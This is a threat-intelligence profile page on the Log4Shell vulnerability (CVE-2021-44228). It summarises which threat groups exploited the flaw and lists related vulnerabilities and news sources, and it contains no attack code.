CVE-2021-44228

Vulnerability updated 25 days ago (2024-08-14T09:36:36.482Z)
Download STIX
Preview STIX
CVE-2021-44228, also known as the Log4Shell vulnerability, is a significant flaw in Apache's Log4j software. Disclosed in December 2021, it quickly became one of the most severe bugs due to its widespread usage and potential for exploitation. Various Advanced Persistent Threat (APT) actors attempted to exploit this vulnerability in systems such as ServiceDesk, but were unsuccessful. However, other groups like GOLD MELODY (UNC961) successfully exploited this vulnerability to access servers like MobileIron Core. The Log4Shell vulnerability has been used by various threat groups, including APT40, which is known for rapidly exploiting newly public vulnerabilities in widely-used software. In addition to Log4J, they have targeted software like Atlassian Confluence and Microsoft Exchange. Another group, TellYouThePass, a ransomware group active since 2019, has also exploited this vulnerability along with others in open-source web development languages. Despite being known for several years, CVE-2021-44228 remains a common exploit attempt, especially against educational institutions where it accounts for 74% of attempts. LockBit, a threat group, was responsible for 30% of ransomware incidents targeting the education sector using this exploit. The vulnerability continues to be of interest to both defenders and attackers, highlighting the need for continued vigilance and prompt patching of known vulnerabilities.
Description last updated: 2024-08-14T09:06:03.754Z
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
IDVotesProfile Description
Log4Shell
11
Log4Shell is a significant software vulnerability that exists within the Log4j Java-based logging utility. The vulnerability, officially designated as CVE-2021-44228, allows potential attackers to execute arbitrary code on targeted systems. Advanced Persistent Threat (APT) actors, including LockBit
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Log4j
Vulnerability
Exploit
Remote Code ...
Exploits
RCE (Remote ...
Apt
exploited
Ransomware
Confluence
Operation Bl...
Malware
Apache
Ofbiz
Analyst Notes & Discussion
Be the first to leave your mark here! Log in to share your views and vote.
Associated Threat Actors
To see the evidence that has resulted in these threatActor associations, create a free account
IDTypeVotesProfile Description
APT40Unspecified
2
APT40 is a China-attributed cyber espionage group known for targeting countries strategically significant to the Belt and Road Initiative. The group has been linked to at least 51 different code families, exhibiting a broad range of capabilities. APT40 typically employs spear-phishing emails, often
APT41Unspecified
2
APT41, a threat actor attributed to China, has been actively targeting organizations in at least 14 countries since 2012. The group is known for its use of an extensive range of malware, with at least 46 different code families and tools observed in their operations. They are associated with various
Associated Vulnerabilities
To see the evidence that has resulted in these vulnerability associations, create a free account
IDTypeVotesProfile Description
CVE-2021-34473Unspecified
3
CVE-2021-34473 is a significant software vulnerability that was discovered in Microsoft Exchange Server. This flaw, along with two others (CVE-2021-31207 and CVE-2021-34523), forms a chain of vulnerabilities known as ProxyShell. These vulnerabilities can be exploited together by remote attackers to
CVE-2021-26084Unspecified
3
CVE-2021-26084 is a critical vulnerability related to Atlassian's Confluence software. The flaw in the software design or implementation was first exploited as a zero-day, before its public disclosure in June 2022. It allowed remote attackers to execute code on a Confluence Server via injection atta
CVE-2021-34523Unspecified
2
None
CVE-2021-44207Unspecified
2
CVE-2021-44207 is a significant software vulnerability that was exploited by APT41, a prolific Chinese state-sponsored espionage group known for targeting both public and private sector organizations. This flaw in the USAHerds web application's design or implementation mirrors a previously reported
ProxyshellUnspecified
2
ProxyShell is a series of vulnerabilities affecting Microsoft Exchange email servers. These flaws in software design or implementation have been exploited by threat actors to gain unauthorized access and control over targeted systems. The ProxyShell vulnerability, officially tracked as CVE-2021-3447
CVE-2021-31207Unspecified
2
CVE-2021-31207 is a significant software vulnerability that has been exploited by APT40, a group known for rapidly taking advantage of newly public vulnerabilities in widely used software. This particular vulnerability affects Atlassian Confluence and Microsoft Exchange, among other platforms, and a
Source Document References
Information about the CVE-2021-44228 Vulnerability was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
PreviewSource LinkCreatedAtTitle
CERT-EU
8 months ago
A Log4Shell Malware Campaign in the DNS Spotlight
DARKReading
a month ago
Feds Warn of North Korean Cyberattacks on US Critical Infrastructure
CISA
a month ago
North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs | CISA
Securityaffairs
2 months ago
Cybersecurity agencies warn of China-linked APT40 's capabilities
CISA
2 months ago
People’s Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action | CISA
Securityaffairs
2 months ago
ExCobalt Cybercrime group targets Russian organizations in multiple sectors
DARKReading
3 months ago
TellYouthePass Ransomware Group Exploits Critical PHP Flaw
InfoSecurity-magazine
4 months ago
Log4J Still Among Top Exploited Vulnerabilities, Cato Finds
DARKReading
5 months ago
Getting Security Remediation on the Boardroom Agenda
CERT-EU
6 months ago
What cyber threats face the education sector?
CERT-EU
6 months ago
Cybersecurity crisis in schools - Help Net Security
CERT-EU
7 months ago
Trustwave reveals cybersecurity threats targeting education sector
CERT-EU
7 months ago
How CVSS 4.0 changes (or doesn’t) the way we see vulnerability severity
CERT-EU
7 months ago
Sensor Intel Series: Top CVEs in December 2023
BankInfoSecurity
7 months ago
FritzFrog Botnet Exploits Log4Shell
Securityaffairs
8 months ago
Experts created a PoC for Apache OFBiz flaw CVE-2023-51467
CERT-EU
8 months ago
New PoC Exploit for Apache OfBiz Vulnerability Poses Risk to ERP Systems
CERT-EU
8 months ago
December 2023's Most Wanted Malware : The Resurgence of Qbot and FakeUpdates – Global Security Mag Online
CERT-EU
8 months ago
Above 30% Apps at Risk with Vulnerable Log4j Versions
CERT-EU
8 months ago
Breaking Cyber News From Cyberint - Cyberint